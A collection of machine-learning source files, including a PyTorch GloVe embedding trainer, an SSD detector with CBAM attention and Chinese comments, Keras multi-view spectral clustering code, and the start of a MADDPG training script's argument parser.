return self.sigmoid(self.final_linear(final_vec)).view((-1, 1))
model = RecurNN()
for epoch in range(len(num_iterations)):
for line in data:
print(line)
print(word_tokenize(line.lower()).join(' '))
``` |
{
"source": "2014mchidamb/TorchGlove",
"score": 3
} |
#### File: 2014mchidamb/TorchGlove/glove.py
```python
from nltk.tokenize import word_tokenize
from torch.autograd import Variable
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.optim as optim
# Set parameters
context_size = 3
embed_size = 2
xmax = 2
alpha = 0.75
batch_size = 20
l_rate = 0.001
num_epochs = 10
# Open and read in text
text_file = open('short_story.txt', 'r')
text = text_file.read().lower()
text_file.close()
# Create vocabulary and word lists
word_list = word_tokenize(text)
vocab = np.unique(word_list)
w_list_size = len(word_list)
vocab_size = len(vocab)
# Create word to index mapping
w_to_i = {word: ind for ind, word in enumerate(vocab)}
# Construct co-occurence matrix
comat = np.zeros((vocab_size, vocab_size))
for i in range(w_list_size):
for j in range(1, context_size+1):
ind = w_to_i[word_list[i]]
if i-j > 0:
lind = w_to_i[word_list[i-j]]
comat[ind, lind] += 1.0/j
if i+j < w_list_size:
rind = w_to_i[word_list[i+j]]
comat[ind, rind] += 1.0/j
# Non-zero co-occurrences
coocs = np.transpose(np.nonzero(comat))
# Weight function
def wf(x):
if x < xmax:
return (x/xmax)**alpha
return 1
# Set up word vectors and biases
l_embed, r_embed = [
[Variable(torch.from_numpy(np.random.normal(0, 0.01, (embed_size, 1))),
requires_grad = True) for j in range(vocab_size)] for i in range(2)]
l_biases, r_biases = [
[Variable(torch.from_numpy(np.random.normal(0, 0.01, 1)),
requires_grad = True) for j in range(vocab_size)] for i in range(2)]
# Set up optimizer
optimizer = optim.Adam(l_embed + r_embed + l_biases + r_biases, lr = l_rate)
# Batch sampling function
def gen_batch():
sample = np.random.choice(np.arange(len(coocs)), size=batch_size, replace=False)
l_vecs, r_vecs, covals, l_v_bias, r_v_bias = [], [], [], [], []
for chosen in sample:
ind = tuple(coocs[chosen])
l_vecs.append(l_embed[ind[0]])
r_vecs.append(r_embed[ind[1]])
covals.append(comat[ind])
l_v_bias.append(l_biases[ind[0]])
r_v_bias.append(r_biases[ind[1]])
return l_vecs, r_vecs, covals, l_v_bias, r_v_bias
# Train model
for epoch in range(num_epochs):
num_batches = int(w_list_size/batch_size)
avg_loss = 0.0
for batch in range(num_batches):
optimizer.zero_grad()
l_vecs, r_vecs, covals, l_v_bias, r_v_bias = gen_batch()
# For pytorch v2 use, .view(-1) in torch.dot here. Otherwise, no need to use .view(-1).
loss = sum([torch.mul((torch.dot(l_vecs[i].view(-1), r_vecs[i].view(-1)) +
l_v_bias[i] + r_v_bias[i] - np.log(covals[i]))**2,
wf(covals[i])) for i in range(batch_size)])
avg_loss += loss.data[0]/num_batches
loss.backward()
optimizer.step()
print("Average loss for epoch "+str(epoch+1)+": ", avg_loss)
# Visualize embeddings
if embed_size == 2:
# Pick some random words
word_inds = np.random.choice(np.arange(len(vocab)), size=10, replace=False)
for word_ind in word_inds:
# Create embedding by summing left and right embeddings
w_embed = (l_embed[word_ind].data + r_embed[word_ind].data).numpy()
x, y = w_embed[0][0], w_embed[1][0]
plt.scatter(x, y)
plt.annotate(vocab[word_ind], xy=(x, y), xytext=(5, 2),
textcoords='offset points', ha='right', va='bottom')
plt.savefig("glove.png")
``` |
{
"source": "2014Vee/ssd-pytorch",
"score": 3
} |
#### File: 2014Vee/ssd-pytorch/ssd.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import os
from layers import *
from data import voc # coco
###############################################################################
# 【通道显著性模块】
class ChannelAttention(nn.Module):
def __init__(self, in_planes, ratio=16):
super(ChannelAttention, self).__init__()
# 特征图先经过最大池化和平均池化 结果是1*1*通道数的tensor【最大池化,平均池化】
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.max_pool = nn.AdaptiveMaxPool2d(1)
# 在经过全连接层先降低维度再升高维度,进行特征融合【MLP】
self.fc1 = nn.Conv2d(in_planes, in_planes // 16, 1, bias=False)
self.relu1 = nn.ReLU()
self.fc2 = nn.Conv2d(in_planes // 16, in_planes, 1, bias=False)
# 【激活层】
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = self.fc2(self.relu1(self.fc1(self.avg_pool(x))))
max_out = self.fc2(self.relu1(self.fc1(self.max_pool(x))))
out = avg_out + max_out # 相加之后每个像素点的位置元素相加
return self.sigmoid(out)
# 【空间显著性模块】
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
assert kernel_size in (3, 7), 'kernel size must be 3 or 7' # 这里设定kernal_size必须是3,7
padding = 3 if kernel_size == 7 else 1
self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=padding, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = torch.mean(x, dim=1, keepdim=True)
max_out, _ = torch.max(x, dim=1, keepdim=True) # 会返回结果元素的值 和 对应的位置index
x = torch.cat([avg_out, max_out], dim=1)
x = self.conv1(x)
return self.sigmoid(x)
# 【Bottleneck将特征图先经过 通道显著性模块,再经过 空间显著性模块】
class Bottleneck(nn.Module): # 将通道显著性和空间显著性模块相连接
def __init__(self, inplanes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.ca = ChannelAttention(inplanes)
self.sa = SpatialAttention()
self.stride = stride
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
save = x # 先将原本的特征图保存下来
out = self.ca(x) * x # 先经过通道显著性模块
out = self.sa(out) * out # 再经过空间显著性模块
out += save ###这里不应该是相乘吗?????为啥变成了相加
out = self.relu(out) # 最后再经过relu激活函数
return out # 输出结果尺寸不变,但是通道数变成了【planes * 4】这就是残差模块
#############################【SSD中融合特征显著性模块CBAM】######################
class SSD(nn.Module):
"""Single Shot Multibox Architecture
The network is composed of a base VGG network followed by the
added multibox conv layers. Each multibox layer branches into
1) conv2d for class conf scores
2) conv2d for localization predictions
3) associated priorbox layer to produce default bounding
boxes specific to the layer's feature map size.
SSD模型由去掉全连接层的vgg网络为基础组成。在之后添加了多盒转化层。
每个多盒层分支是:
1)conv2d 获取分类置信度
2)conv2d进行坐标位置预测
3)相关层去产生特定于该层特征图大小的默认的预测框bounding boxes
See: https://arxiv.org/pdf/1512.02325.pdf for more details.
Args:
phase: (string) Can be "test" or "train"
size: input image size 输入的图像尺寸
base: VGG16 layers for input, size of either 300 or 500 经过修改的vgg网络
extras: extra layers that feed to multibox loc and conf layers
提供多盒定位的格外层 和 分类置信层(vgg网络后面新增的额外层)
head: "multibox head" consists of loc and conf conv layers
由定位和分类卷积层组成的multibox head
(loc_layers, conf_layers) vgg与extras中进行分类和回归的层
"""
def __init__(self, phase, size, base, extras, head, num_classes):
super(SSD, self).__init__()
self.phase = phase
self.num_classes = num_classes
self.cfg = voc
# 新定义一个类,该类的功能:对于每个feature map,生成预测框(中心坐标及偏移量)
self.priorbox = PriorBox(self.cfg)
# 调用forward,返回生成的预测框结果
# 对于所有预测的feature map,存储着生成的不同长宽比的默认框(可以理解为anchor)
self.priors = Variable(self.priorbox.forward(), volatile=True)
# 300
self.size = size
# SSD network范围
# 经过修改的vgg网络
self.vgg = nn.ModuleList(base) ################################################
# Layer learns to scale the l2 normalized features from conv4_3
# Layer层从conv4_3学习去缩放l2正则化特征
# 论文中conv4_3 相比较于其他的layers,有着不同的 feature scale,我们使用 ParseNet 中的 L2 normalization 技术
# 将conv4_3 feature map 中每一个位置的 feature norm scale 到 20,并且在 back-propagation 中学习这个 scale
self.L2Norm = L2Norm(512, 20)
# vgg网络后面新增的额外层
self.extras = nn.ModuleList(extras)
# vgg与extras中进行分类和回归的层
self.loc = nn.ModuleList(head[0])
self.conf = nn.ModuleList(head[1])
# 如果网络用于测试,则加入softmax和检测
if phase == 'test':
self.softmax = nn.Softmax(dim=-1)
self.detect = Detect(num_classes, 0, 200, 0.01, 0.45)
# =====bobo新增==================
# pool2到conv4_3 扩张卷积,尺度少一半
self.DilationConv_128_128 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=2, dilation=2,
stride=2)
# conv4_3到conv4_3 尺度不变
self.conv_512_256 = nn.Conv2d(in_channels=512, out_channels=256, kernel_size=3, padding=1, stride=1)
# fc7 到 conv4_3 反卷积上采样,尺度大一倍
self.DeConv_1024_128 = nn.ConvTranspose2d(in_channels=1024, out_channels=128, kernel_size=2, stride=2)
# conv4_3 到FC7 扩张卷积,尺度少一半
self.DilationConv_512_128 = nn.Conv2d(in_channels=512, out_channels=128, kernel_size=3, padding=2, dilation=2,
stride=2)
# FC7到FC7 尺度不变
self.conv_1024_256 = nn.Conv2d(in_channels=1024, out_channels=256, kernel_size=3, padding=1, stride=1)
# conv8_2 到 FC7 反卷积上采样,尺度大一倍 10->19
self.DeConv_512_128 = nn.ConvTranspose2d(in_channels=512, out_channels=128, kernel_size=3, stride=2, padding=1)
# conv5_3到conv8_2
self.DilationConv_512_128_2 = nn.Conv2d(in_channels=512, out_channels=128, kernel_size=3, padding=2, dilation=2,
stride=2)
# conv8_2到conv8_2 尺度不变
self.conv_512_256_2 = nn.Conv2d(in_channels=512, out_channels=256, kernel_size=3, padding=1, stride=1)
# conv9_2到conv8_2
self.DeConv_256_128_2 = nn.ConvTranspose2d(in_channels=256, out_channels=128, kernel_size=2, stride=2)
# 平滑层
self.smooth = nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1)
# 通道数BN层的参数是输出通道数out_channels
self.bn = nn.BatchNorm2d(128)
# CBAM模块【6个特征层:512 512 512 256 256 256 】
self.CBAM1 = Bottleneck(512)
self.CBAM2 = Bottleneck(512)
self.CBAM3 = Bottleneck(512)
self.CBAM4 = Bottleneck(256)
self.CBAM5 = Bottleneck(256)
self.CBAM6 = Bottleneck(256)
def forward(self, x):
"""Applies network layers and ops on input image(s) x.
前向传播
Args:
x: input image or batch of images. Shape: [batch,3,300,300].
Return:
Depending on phase:
test测试集:
Variable(tensor) of output class label predictions,
confidence score, and corresponding location predictions for
each object detected. Shape: [batch,topk,7]
train训练集:
list of concat outputs from:
1: 分类层confidence layers, Shape: [batch*num_priors,num_classes]
2: 回归定位层localization layers, Shape: [batch,num_priors*4]
3: priorbox layers, Shape: [2,num_priors*4]
"""
# sources保存 网络生成的不同层feature map结果,以便使用这些feature map来进行分类与回归
sources = list()
# 保存预测层不同feature map通过回归和分类网络的输出结果
loc = list()
conf = list()
# 原论文中vgg的conv4_3,relu之后加入L2 Normalization正则化,然后保存feature map
# apply vgg up to conv4_3 relu
# 将vgg层的feature map保存
# k的范围为0-22
# =========开始保存 所需的所有中间信息
# 保存pool2(pool下标从1开始)的结果
# 经过maxpool,所以不需要L2Norm正则化
for k in range(10):
x = self.vgg[k](x)
sources.append(x)
# 保存conv4_3结果
for k in range(10, 23):
x = self.vgg[k](x)
s = self.L2Norm(x)
sources.append(s)
# 保存conv5_3结果 类似conv4_3原仓库一样,加入L2Norm
for k in range(23, 30):
x = self.vgg[k](x)
s = self.L2Norm(x)
sources.append(s)
# 保存 原fc7的输出结果
# apply vgg up to fc7,即将原fc7层更改为卷积层输出的结果,经过relu之后保存结果
# k的范围为23 - 结束
for k in range(30, len(self.vgg)):
x = self.vgg[k](x)
sources.append(x)
# 将新加的额外层 conv8_2、conv9_2、conv10_2、conv11_2结果保存
# apply extra layers and cache source layer outputs
# 将新增层的feature map保存
for k, v in enumerate(self.extras):
# 每经过一个conv卷积,都relu一下
x = F.relu(v(x), inplace=True)
# 论文中隔一个conv保存一个结果
if k % 2 == 1:
sources.append(x)
# 此时sources保存了所有中间结果,论文中的pool2、conv4_3、conv5_3、fc7、conv8_2、conv9_2、conv10_2、conv11_2
# sources_final保存各层融合之后的最终结果
sources_final = list()
# con4_3层融合结果 self.bn1(self.conv1(x)) 在通道维度上融合
conv4_fp = torch.cat((F.relu(self.bn(self.DilationConv_128_128(sources[0])), inplace=True),
F.relu(self.conv_512_256(sources[1]), inplace=True),
F.relu(self.DeConv_1024_128(sources[3]), inplace=True)), 1)
# sources_final.append(F.relu( self.smooth(conv4_fp) , inplace=True))
conv4_fp = F.relu(self.smooth(conv4_fp), inplace=True)
sources_final.append(self.CBAM1(conv4_fp))
# FC7层融合结果
fc7_fp = torch.cat((F.relu(self.bn(self.DilationConv_512_128(sources[1])), inplace=True),
F.relu(self.conv_1024_256(sources[3]), inplace=True),
F.relu(self.DeConv_512_128(sources[4]), inplace=True)), 1)
# sources_final.append(F.relu( self.smooth(fc7_fp) , inplace=True))
fc7_fp = F.relu(self.smooth(fc7_fp), inplace=True)
sources_final.append(self.CBAM2(fc7_fp))
# conv8_2层融合结果
conv8_fp = torch.cat((F.relu(self.bn(self.DilationConv_512_128_2(sources[2])), inplace=True),
F.relu(self.conv_512_256_2(sources[4]), inplace=True),
F.relu(self.DeConv_256_128_2(sources[5]), inplace=True)), 1)
# sources_final.append(F.relu( self.smooth(conv8_fp) , inplace=True))
conv8_fp = F.relu(self.smooth(conv8_fp), inplace=True)
sources_final.append(self.CBAM3(conv8_fp))
# 保存 conv9_2、conv10_2、conv11_2
sources_final.append(self.CBAM4(sources[5]))
sources_final.append(self.CBAM5(sources[6]))
sources_final.append(self.CBAM6(sources[7]))
# apply multibox head to source layers
# permute 将tensor的维度换位 参数为换位顺序
# contiguous 返回一个内存连续的有相同数据的tensor
# source保存的是每个预测层的网络输出,即feature maps
# loc 通过使用feature map去预测回归
# conf通过使用feature map去预测分类
for (x, l, c) in zip(sources_final, self.loc, self.conf):
loc.append(l(x).permute(0, 2, 3, 1).contiguous())
conf.append(c(x).permute(0, 2, 3, 1).contiguous())
# 在给定维度上对输入的张量序列seq 进行连接操作 dimension=1表示在列上连接
loc = torch.cat([o.view(o.size(0), -1) for o in loc], 1)
conf = torch.cat([o.view(o.size(0), -1) for o in conf], 1)
# 测试集上的输出
if self.phase == "test":
output = self.detect(
loc.view(loc.size(0), -1, 4), # loc preds 定位的预测
self.softmax(conf.view(conf.size(0), -1,
self.num_classes)), # conf preds 分类的预测
self.priors.type(type(x.data)) # default boxes 预测框
)
else:
# 训练集上的输出
output = (
loc.view(loc.size(0), -1, 4), # loc preds [32,8732,4] 通过网络输出的定位的预测
conf.view(conf.size(0), -1, self.num_classes), # conf preds [32,8732,21] 通过网络输出的分类的预测
self.priors # 不同feature map根据公式生成的锚结果 [8732,4] 内容为 中心点坐标和宽高
)
return output
def load_weights(self, base_file):
other, ext = os.path.splitext(base_file)
if ext == '.pkl' or '.pth':
print('Loading weights into state dict...')
self.load_state_dict(torch.load(base_file, map_location=lambda storage, loc: storage))
print('Finished!')
else:
print('Sorry only .pth and .pkl files supported.')
# This function is derived from torchvision VGG make_layers()
# 此方法源自torchvision VGG make_layers()
# https://github.com/pytorch/vision/blob/master/torchvision/models/vgg.py
def vgg(cfg, i, batch_norm=False):
'''
vgg的结构
cfg: vgg的结构
'300': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'C', 512, 512, 512, 'M',
512, 512, 512],
i: 3 输入图像通道数
batch_norm 为False。若为True,则网络中加入batch_norm
返回没有全连接层的vgg网络
'''
# 保存vgg所有层
layers = []
# 输入图像通道数
in_channels = i
for v in cfg: # M与C会导致生成的feature map大小出现变化
if v == 'M': # 最大池化层 默认floor模式
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
elif v == 'C': # 最大池化层 ceil模式 两种不同的maxpool方式 参考https://blog.csdn.net/GZHermit/article/details/79351803
layers += [nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)]
else:
# 卷积
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
# 论文将 Pool5 layer 的参数,从 卷积核2×2步长为2 转变成 卷积核3×3 步长为1 外加一个 pad
pool5 = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)
# 论文中将VGG的FC6 layer、FC7 layer 转成为 卷积层conv6,conv7 并从模型的FC6、FC7 上的参数,进行采样得到这两个卷积层的 参数
# 输入通道512 输出通道为1024 卷积核为3 padding为6 dilation为卷积核中元素之间的空洞大小
# 修改Pool5 layer参数,导致感受野大小改变。所以conv6采用 atrous 算法,即孔填充算法。
# 孔填充算法将卷积 weights 膨胀扩大,即原来卷积核是 3x3,膨胀后,可能变成 7x7 了,这样 receptive field 变大了,而 score map 也很大,即输出变成 dense
# 这么做的好处是,输出的 score map 变大了,即是 dense 的输出了,而且 receptive field 不会变小,而且可以变大。这对做分割、检测等工作非常重要。
conv6 = nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6)
# 输入通道512 输出通道为1024 卷积核为3
conv7 = nn.Conv2d(1024, 1024, kernel_size=1)
# 将 修改的层也加入到vgg网络中
layers += [pool5, conv6,
nn.ReLU(inplace=True), conv7, nn.ReLU(inplace=True)]
return layers
def add_extras(cfg, i, batch_norm=False):
'''
vgg网络后面新增的额外层
:param cfg: '300': [256, 'S', 512, 128, 'S', 256, 128, 256, 128, 256],
:param i: 1024 输入通道数
:param batch_norm: flase
:return:
'''
# 添加到VGG的额外图层用于特征缩放
layers = []
# 1024 输入通道数
in_channels = i
# 控制卷积核尺寸,一维数组选前一个数还是后一个数。在每次循环时flag都改变,导致网络的卷积核尺寸为1,3,1,3交替
# False 为1,True为3
# SSD网络图中s1指步长为1,s2指步长为2
# 在该代码中,S代表步长为2,无S代表默认,即步长为1,所以cfg与论文网络结构完全匹配
flag = False
# enumerate枚举 k为下标 v为值
for k, v in enumerate(cfg):
if in_channels != 'S':
if v == 'S':
layers += [nn.Conv2d(in_channels, cfg[k + 1],
kernel_size=(1, 3)[flag], stride=2, padding=1)]
else:
layers += [nn.Conv2d(in_channels, v, kernel_size=(1, 3)[flag])]
flag = not flag
in_channels = v
return layers
def multibox(vgg, extra_layers, cfg, num_classes):
'''
:param vgg: 经过修改后的vgg网络(去掉全连接层,修改pool5参数并添加新层)
:param extra_layers: vgg网络后面新增的额外层
:param cfg: '300': [4, 6, 6, 6, 4, 4], 不同部分的feature map上一个网格预测多少框
:param num_classes: 20分类+1背景,共21类
:return:
'''
# 保存所有参与预测的网络层
loc_layers = []
conf_layers = []
# 传入的修改过的vgg网络用于预测的网络是21层以及 倒数第二层
vgg_source = [21, -2]
for k, v in enumerate(vgg_source):
# 按照fp-ssd论文,将1024改为512通道
if k == 1:
in_channels = 512
else:
in_channels = vgg[v].out_channels
# 4是回归的坐标参数 cfg代表该层feature map上一个网格预测多少框
loc_layers += [nn.Conv2d(in_channels,
cfg[k] * 4, kernel_size=3, padding=1)]
# num_classes是类别数 cfg代表该层feature map上一个网格预测多少框
conf_layers += [nn.Conv2d(in_channels,
cfg[k] * num_classes, kernel_size=3, padding=1)]
# [x::y] 从下标x开始,每隔y取值
# 论文中新增层也是每隔一个层添加一个预测层
# 将新增的额外层中的预测层也添加上 start=2:下标起始位置
for k, v in enumerate(extra_layers[1::2], 2):
loc_layers += [nn.Conv2d(v.out_channels, cfg[k]
* 4, kernel_size=3, padding=1)]
conf_layers += [nn.Conv2d(v.out_channels, cfg[k]
* num_classes, kernel_size=3, padding=1)]
return vgg, extra_layers, (loc_layers, conf_layers)
base = {
# 数字为每层feature map的层数 M代表最大池化层(默认floor模式) C代表最大池化层(ceil模式) (去掉vgg16的最后的 maxpool、fc、fc、fc、softmax)
'300': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'C', 512, 512, 512, 'M',
512, 512, 512],
'512': [],
}
extras = {
# 每个特征图都是由 两个conv 组成, conv1x1 和conv3x3
'300': [256, 'S', 512, 128, 'S', 256, 128, 256, 128, 256],
'512': [],
}
mbox = {
'300': [4, 6, 6, 6, 4, 4], # 不同部分的feature map上一个网格预测多少框
'512': [],
}
def build_ssd(phase, size=300, num_classes=21):
'''
新建SSD模型
'''
# 训练或测试
if phase != "test" and phase != "train":
print("ERROR: Phase: " + phase + " not recognized")
return
# 当前SSD300只支持大小300×300的数据集训练
if size != 300:
print("ERROR: You specified size " + repr(size) + ". However, " +
"currently only SSD300 (size=300) is supported!")
return
# base_: 经过修改后的vgg网络(去掉全连接层,修改pool5参数并添加新层)
# extras_: vgg网络后面新增的额外层
# head_ : (loc_layers, conf_layers) vgg与extras中进行分类和回归的层
base_, extras_, head_ = multibox(vgg(base[str(size)], 3),
add_extras(extras[str(size)], 1024),
mbox[str(size)],
num_classes)
# phase:'train' size:300 num_classes: 21 类别数(20类+1背景)
return SSD(phase, size, base_, extras_, head_, num_classes)
``` |
{
"source": "201518015029022/zzzzzz",
"score": 3
} |
#### File: zzzzzz/core/data.py
```python
import numpy as np
import scipy.io as sio
from keras import backend as K
from keras.models import model_from_json
from core import util
from core import pairs
def get_data(params):
'''
load data
data_list contains the multi-view data for SiameseNet and MvSCN
'''
# data list (views)
data_list = []
if params['views'] is None:
params['views'] = range(1, params['view_size']+1)
for i in params['views']:
view_name = 'view'+str(i)
print('********', 'load', params['dset'], view_name, '********')
ret = {}
x_train, y_train, x_test, y_test = load_data(params, i)
print('data size (training, testing)', x_train.shape, x_test.shape)
# Using the low-dimension data via AE
if params['use_code_space']:
all_data = [x_train, x_test]
for j, d in enumerate(all_data):
all_data[j] = embed_data(d, dset=params['dset'] , view_name=view_name)
x_train, x_test = all_data
# data for MvSCN
ret['spectral'] = (x_train, y_train, x_test, y_test)
# prepare the training pairs for SiameseNet
ret['siamese'] = {}
pairs_train, dist_train = pairs.create_pairs_from_unlabeled_data(
x1=x_train,
k=params['siam_k'],
tot_pairs=params['siamese_tot_pairs'],
)
# data for SiameseNet
ret['siamese'] = (pairs_train, dist_train)
data_list.append(ret)
return data_list
def load_data(params, view):
'''
load data for training and testing
'''
# multi-view
if params['dset'] == 'noisymnist':
data = util.load_data('noisymnist_view'+str(view)+'.gz', 'https://www2.cs.uic.edu/~vnoroozi/noisy-mnist/noisymnist_view'+str(view)+'.gz')
train_set_x, train_set_y = data[0]
valid_set_x, valid_set_y = data[1]
test_set_x, test_set_y = data[2]
train_set_x, train_set_y = np.concatenate((train_set_x, valid_set_x), axis=0), np.concatenate((train_set_y, valid_set_y), axis=0)
elif params['dset'] == 'Caltech101-20':
mat = sio.loadmat('./data/'+params['dset']+'.mat')
X = mat['X'][0]
x = X[view-1]
x = util.normalize(x)
y = np.squeeze(mat['Y'])
# split it into two partitions
data_size = x.shape[0]
train_index, test_index = util.random_index(data_size, int(data_size*0.5), 1)
test_set_x = x[test_index]
test_set_y = y[test_index]
train_set_x = x[train_index]
train_set_y = y[train_index]
else:
raise ValueError('Dataset provided ({}) is invalid!'.format(params['dset']))
return train_set_x, train_set_y, test_set_x, test_set_y
def embed_data(x, dset, view_name):
'''
obtain the AE features
'''
if x is None:
return None
if not x.shape[0]:
return np.zeros(shape=(0, 10))
# use pretrained autoencoder from DEC
json_path = './pretrain/ae/'+dset+'/ae_{}.json'.format(dset+'_'+view_name)
weights_path = './pretrain/ae/'+dset+'/ae_{}_weights.h5'.format(dset+'_'+view_name)
with open(json_path) as f:
pt_ae = model_from_json(f.read())
pt_ae.load_weights(weights_path)
x = x.reshape(-1, np.prod(x.shape[1:]))
get_embeddings = K.function([pt_ae.input],
[pt_ae.layers[4].output])
x_embedded = predict_with_K_fn(get_embeddings, x)[0]
del pt_ae
return x_embedded
def predict_with_K_fn(K_fn, x, bs=1000):
'''
Convenience function: evaluates x by K_fn(x), where K_fn is
a Keras function, by batches of size 1000.
'''
if not isinstance(x, list):
x = [x]
num_outs = len(K_fn.outputs)
y = [np.empty((x[0].shape[0], output_.get_shape()[1])) for output_ in K_fn.outputs]
recon_means = []
for i in range(int(x[0].shape[0]/bs + 1)):
x_batch = []
for x_ in x:
x_batch.append(x_[i*bs:(i+1)*bs])
temp = K_fn(x_batch)
for j in range(num_outs):
y[j][i*bs:(i+1)*bs] = temp[j]
return y
```
#### File: zzzzzz/core/layer.py
```python
import numpy as np
import tensorflow as tf
from keras.regularizers import l2
from keras.layers import Dense, BatchNormalization, Flatten, Conv2D, MaxPooling2D, Lambda, Dropout
from keras import backend as K
def Orthogonal_op(x, epsilon=1e-4):
'''
Computes a matrix that orthogonalizes the input matrix x
x: an n x d input matrix
eps: epsilon to prevent nonzero values in the diagonal entries of x
returns: a d x d matrix, ortho_weights, which orthogonalizes x by
right multiplication
'''
x_2 = K.dot(K.transpose(x), x)
x_2 += K.eye(K.int_shape(x)[1])*epsilon
L = tf.cholesky(x_2)
ortho_weights = tf.transpose(tf.matrix_inverse(L)) * tf.sqrt(tf.cast(tf.shape(x)[0], dtype=K.floatx()))
return ortho_weights
def Orthogonal(x, name=None):
'''
Builds keras layer that handles orthogonalization of x
x: an n x d input matrix
name: name of the keras layer
returns: a keras layer instance. during evaluation, the instance returns an n x d orthogonal matrix
if x is full rank and not singular
'''
# get dimensionality of x
d = x.get_shape().as_list()[-1]
# compute orthogonalizing matrix
ortho_weights = Orthogonal_op(x)
# create variable that holds this matrix
ortho_weights_store = K.variable(np.zeros((d,d)))
# create op that saves matrix into variable
ortho_weights_update = tf.assign(ortho_weights_store, ortho_weights, name='ortho_weights_update')
# switch between stored and calculated weights based on training or validation
l = Lambda(lambda x: K.in_train_phase(K.dot(x, ortho_weights), K.dot(x, ortho_weights_store)), name=name)
l.add_update(ortho_weights_update)
return l
def stack_layers(inputs, layers, kernel_initializer='glorot_uniform'):
'''
Builds the architecture of the network by applying each layer specified in layers to inputs.
inputs: a dict containing input_types and input_placeholders for each key and value pair, respectively.
for spectralnet, this means the input_types 'Embedding' and 'Orthogonal'*
layers: a list of dicts containing all layers to be used in the network, where each dict describes
one such layer. each dict requires the key 'type'. all other keys are dependent on the layer
type
kernel_initializer: initialization configuration passed to keras (see keras initializers)
returns: outputs, a dict formatted in much the same way as inputs. it contains input_types and
output_tensors for each key and value pair, respectively, where output_tensors are
the outputs of the input_placeholders in inputs after each layer in layers is applied
* this is necessary since spectralnet takes multiple inputs and performs special computations on the
orthogonal layer
'''
outputs = dict()
for key in inputs:
outputs[key]=inputs[key]
for layer in layers:
# check for l2_reg argument
l2_reg = layer.get('l2_reg')
if l2_reg:
l2_reg = l2(layer['l2_reg'])
# create the layer
if layer['type'] == 'softplus_reg':
l = Dense(layer['size'], activation='softplus', kernel_initializer=kernel_initializer, kernel_regularizer=l2(0.001), name=layer.get('name'))
elif layer['type'] == 'softplus':
l = Dense(layer['size'], activation='softplus', kernel_initializer=kernel_initializer, kernel_regularizer=l2_reg, name=layer.get('name'))
elif layer['type'] == 'softmax':
l = Dense(layer['size'], activation='softmax', kernel_initializer=kernel_initializer, kernel_regularizer=l2_reg, name=layer.get('name'))
elif layer['type'] == 'tanh':
l = Dense(layer['size'], activation='tanh', kernel_initializer=kernel_initializer, kernel_regularizer=l2_reg, name=layer.get('name'))
elif layer['type'] == 'relu':
l = Dense(layer['size'], activation='relu', kernel_initializer=kernel_initializer, kernel_regularizer=l2_reg, name=layer.get('name'))
elif layer['type'] == 'selu':
l = Dense(layer['size'], activation='selu', kernel_initializer=kernel_initializer, kernel_regularizer=l2_reg, name=layer.get('name'))
elif layer['type'] == 'Conv2D':
l = Conv2D(layer['channels'], kernel_size=layer['kernel'], activation='relu', data_format='channels_last', kernel_regularizer=l2_reg, name=layer.get('name'))
elif layer['type'] == 'BatchNormalization':
l = BatchNormalization(name=layer.get('name'))
elif layer['type'] == 'MaxPooling2D':
l = MaxPooling2D(pool_size=layer['pool_size'], data_format='channels_first', name=layer.get('name'))
elif layer['type'] == 'Dropout':
l = Dropout(layer['rate'], name=layer.get('name'))
elif layer['type'] == 'Flatten':
l = Flatten(name=layer.get('name'))
elif layer['type'] == 'Orthogonal':
l = Orthogonal(outputs['Orthogonal'], name=layer.get('name'));
else:
raise ValueError("Invalid layer type '{}'".format(layer['type']))
# apply the layer to each input in inputs
for k in outputs:
outputs[k]=l(outputs[k])
return outputs
``` |
{
"source": "2015211289/multiagnet-RL-",
"score": 2
} |
#### File: maddpg_impl/experiments/train.py
```python
import argparse
import numpy as np
import os
# use GPU or not
# if network is small and shallow, CPU may be faster than GPU
os.environ["CUDA_VISIBLE_DEVICES"]="-1"
import tensorflow as tf
import time
import pickle
import maddpg.common.tf_util as U
from maddpg.trainer.maddpg import MADDPGAgentTrainer
import tensorflow.contrib.layers as layers
from tensorflow.contrib import rnn
from reward_shaping.embedding_model import EmbeddingModel
from reward_shaping.config import Config
from multiagent.multi_discrete import MultiDiscrete
from pyinstrument import Profiler
def parse_args():
parser = argparse.ArgumentParser("Reinforcement Learning experiments for multiagent environments")
# Environment
parser.add_argument("--scenario", type=str, default="simple_reference", help="name of the scenario script")
parser.add_argument("--max-episode-len", type=int, default=2000, help="maximum episode length")
parser.add_argument("--num-episodes", type=int, default=500, help="number of episodes")
parser.add_argument("--num-adversaries", type=int, default=0, help="number of adversaries")
parser.add_argument("--good-policy", type=str, default="matd3", help="policy for good agents")
parser.add_argument("--adv-policy", type=str, default="matd3", help="policy of adversaries")
# Core training parameters
parser.add_argument("--lr", type=float, default=1e-4, help="learning rate for Adam optimizer")
parser.add_argument("--gamma", type=float, default=0.95, help="discount factor")
parser.add_argument("--batch-size", type=int, default=1024, help="number of episodes to optimize at the same time")
parser.add_argument("--num-units", type=int, default=256, help="number of units in the mlp")
# Checkpointing
parser.add_argument("--exp-name", type=str, default="test", help="name of the experiment")
parser.add_argument("--save-dir", type=str, default="./policy/", help="directory in which training state and model should be saved")
parser.add_argument("--save-rate", type=int, default=1, help="save model once every time this many episodes are completed")
parser.add_argument("--load-dir", type=str, default="./policy/", help="directory in which training state and model are loaded")
# Evaluation
parser.add_argument("--restore", action="store_true", default=False)
